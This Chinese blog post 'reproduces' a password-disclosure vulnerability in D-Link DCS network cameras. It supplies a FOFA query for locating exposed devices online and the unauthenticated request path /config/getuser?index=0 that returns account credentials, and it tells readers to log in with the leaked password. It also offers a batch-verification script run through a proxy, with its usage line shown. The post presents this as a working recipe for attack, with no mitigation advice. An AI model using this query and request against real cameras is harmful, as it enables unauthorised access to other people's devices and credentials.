漏洞复现 D-Link DCS 密码泄露漏洞

漏洞描述

D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者可以根据泄露信息,进入后台

适用范围中小企业设备类型网络摄像机

图象分辨率(dpi)704×480,352×240,176×120压缩方式MPEG4

视频输出音频/视频AV输出操作系统Windows 98SE/ME/2000/XP

图片[1]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地

漏洞复现

fofa:app=”D_Link-DCS-4622″

1.使用poc进行账号密码查看,得到密码登录即可

/config/getuser?index=0
图片[2]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地
图片[3]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地

批量验证脚本

评论后获取哦

使用教程:python3 poc.txt -t threads -u urls.txt

这里使用了代理,”socks”:”socks://127.0.0.1:10808″,需要自己更换

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容